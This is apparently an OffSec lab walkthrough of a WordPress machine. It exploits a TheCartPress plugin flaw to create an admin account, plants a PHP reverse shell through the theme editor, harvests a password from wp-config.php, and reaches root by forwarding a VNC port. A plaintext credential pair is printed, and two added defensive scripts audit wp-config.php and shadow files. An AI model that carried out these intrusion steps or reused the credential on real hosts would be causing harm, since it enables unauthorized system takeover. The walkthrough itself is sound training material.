
Initial shell

Port scan detail:

WordPress is running on port 80. It can be scanned with wpscan, or the TheCartPress plugin can be
identified by looking directly at the page source.

A Google search for a TheCartPress exploit found the one below:



https://www.exploit-db.com/exploits/50378
python3 50378.py http://targetIP

After that you can log in to WordPress as the admin user it creates.


# Account details the exploit script submits (from the walkthrough)
data = {
    "tcp_new_user_name": "admin_02",
    "tcp_new_user_pass": "admin1234",
    "tcp_repeat_user_pass": "admin1234",
    "tcp_new_user_email": "test@test.com",
    "tcp_role": "administrator",
}

Once you are admin, go to the theme editor and replace the contents of archive.php with the
pentestmonkey PHP reverse shell. Visit archive.php and you will get the reverse shell.

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Visit the site and you have a reverse shell.

The reverse shell gives you a session as the www-data user. Then run linpeas.sh; it will find a
password in wp-config.php.

Full file path: /srv/www/wordpress/wp-config.php
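Two things made the steps above work: the theme editor was allowed to write PHP under the web root, and wp-config.php held a reusable password. The following is an added example, not part of the walkthrough, that parses the define() constants of a wp-config.php and reports those weaknesses from a defender's side. The file contents and the password in it are constructed; the mode value is an assumption the caller would normally take from os.stat() on the real file.

```python
"""Hardening check for a WordPress wp-config.php (added example, constructed input)."""
import re

# Constructed wp-config.php excerpt; the password is invented, not the target's.
SAMPLE_WP_CONFIG = """\
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'constructed-example-password' );
define( 'DB_HOST', 'localhost' );
define( 'WP_DEBUG', false );
"""

# Matches define( 'NAME', value ); with single or double quotes around the name.
DEFINE_RE = re.compile(r"""define\(\s*['"]([A-Za-z_]+)['"]\s*,\s*(.+?)\s*\)\s*;""")


def parse_defines(text):
    """Return {constant_name: value} with PHP true/false mapped to Python bools."""
    out = {}
    for name, raw in DEFINE_RE.findall(text):
        raw = raw.strip()
        if raw.lower() == "true":
            out[name] = True
        elif raw.lower() == "false":
            out[name] = False
        else:
            out[name] = raw.strip("'\"")
    return out


def check_wp_config(text, mode):
    """Return sorted finding codes for the config text and its file mode bits.

    mode is the permission bits of wp-config.php (e.g. 0o644); on a real host a
    caller would pass os.stat(path).st_mode & 0o777.
    """
    defines = parse_defines(text)
    findings = []
    # DISALLOW_FILE_EDIT true removes the theme/plugin editor, which the
    # walkthrough used to drop a PHP reverse shell into archive.php.
    if defines.get("DISALLOW_FILE_EDIT") is not True:
        findings.append("FILE_EDIT_ENABLED")
    # Any 'other' read bit lets every local account read DB_PASSWORD.
    if mode & 0o004:
        findings.append("WORLD_READABLE")
    # Debug output can leak paths and queries to unauthenticated visitors.
    if defines.get("WP_DEBUG") is True:
        findings.append("DEBUG_ENABLED")
    return sorted(findings)


if __name__ == "__main__":
    # Weak: editor still enabled, file readable by everyone.
    print(check_wp_config(SAMPLE_WP_CONFIG, 0o644))
    # Hardened: editor disabled, file readable only by owner and web group.
    hardened = SAMPLE_WP_CONFIG + "define( 'DISALLOW_FILE_EDIT', true );\n"
    print(check_wp_config(hardened, 0o640))
```

The password reuse itself cannot be judged from this file alone; the check only shows whether the file is exposed more widely than the web server needs and whether the editor path into code execution is still open.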

With this password you can log in as the user whose directory is in /home.

Jsmith:tequieromucho

Lateral movement is now done: SSH in with the password found.

It is recommended to run linpeas.sh again.


You will see that the VNC port is only reachable from inside the box (it listens on 127.0.0.1).

Bring the port to the local machine with SSH remote port forwarding.

ssh -N -R tun0IP:5901:127.0.0.1:5901 kali@tun0IP

Then log in using vncviewer.

To log in, we must use the password we found in the config file before.

vncviewer 127.0.0.1:5901

tequieromucho

The session opens as root, but by OffSec rules only typing and cat may be used in it.

Since we are root, we can check that the root hash in /etc/shadow is the same as the jsmith hash.
This means you can become root with the tequieromucho password.

After that, SSH in as the root user.
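The final step relies on root and jsmith sharing one password hash in /etc/shadow. The audit below is an added example, not part of the walkthrough, written from the defender's side: it parses shadow-format records and reports accounts that share a hash, accounts with an empty password field, and hashes made with a weak or legacy crypt scheme. The shadow lines are constructed and the hash strings are invented; on a real host the function would be fed the contents of /etc/shadow, which only root can read.

```python
"""Audit /etc/shadow-format records for password reuse and weak hashes (added example)."""
from collections import defaultdict

# Constructed shadow excerpt. Hashes are made-up strings, not real credentials;
# the duplicated root/jsmith hash models the situation found in the write-up.
SAMPLE_SHADOW = """\
root:$6$c0nstructed$Zm9yZGVtb25zdHJhdGlvbm9ubHk:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
jsmith:$6$c0nstructed$Zm9yZGVtb25zdHJhdGlvbm9ubHk:19000:0:99999:7:::
legacy:$1$olds4lt$YWxzb2NvbnN0cnVjdGVk:19000:0:99999:7:::
backup:!:19000:0:99999:7:::
guest::19000:0:99999:7:::
"""

# crypt(3) id prefixes considered weak for a modern system.
WEAK_PREFIXES = {"$1$": "md5crypt"}


def parse_shadow(text):
    """Return {user: password_field} for every record in shadow format."""
    records = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue  # not a shadow record
        records[fields[0]] = fields[1]
    return records


def is_real_hash(field):
    """True if the field is an actual hash (not locked '*'/'!' and not empty)."""
    return bool(field) and not field.startswith(("*", "!"))


def find_reused_hashes(records):
    """Groups of users (sorted) whose password fields are identical hashes."""
    by_hash = defaultdict(list)
    for user, field in records.items():
        if is_real_hash(field):
            by_hash[field].append(user)
    return sorted(sorted(users) for users in by_hash.values() if len(users) > 1)


def find_empty_passwords(records):
    """Users with an empty password field (no password required)."""
    return sorted(user for user, field in records.items() if field == "")


def find_weak_algorithms(records):
    """{user: scheme} for hashes using a weak or legacy crypt scheme."""
    found = {}
    for user, field in records.items():
        if not is_real_hash(field):
            continue
        if field.startswith("$"):
            for prefix, name in WEAK_PREFIXES.items():
                if field.startswith(prefix):
                    found[user] = name
        else:
            found[user] = "descrypt"  # traditional DES crypt has no '$id$' prefix
    return found


def audit(text):
    """Run all checks over shadow-format text and return the findings."""
    records = parse_shadow(text)
    return {
        "reused": find_reused_hashes(records),
        "empty": find_empty_passwords(records),
        "weak": find_weak_algorithms(records),
    }


if __name__ == "__main__":
    for check, result in audit(SAMPLE_SHADOW).items():
        print(f"{check}: {result}")
```

Hash equality is the exact signal the walkthrough exploited: identical salt and digest mean identical passwords, so the audit can flag reuse without ever recovering the password. Run it from a configuration-management or compliance job rather than by hand, and treat any group containing root as a priority finding.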

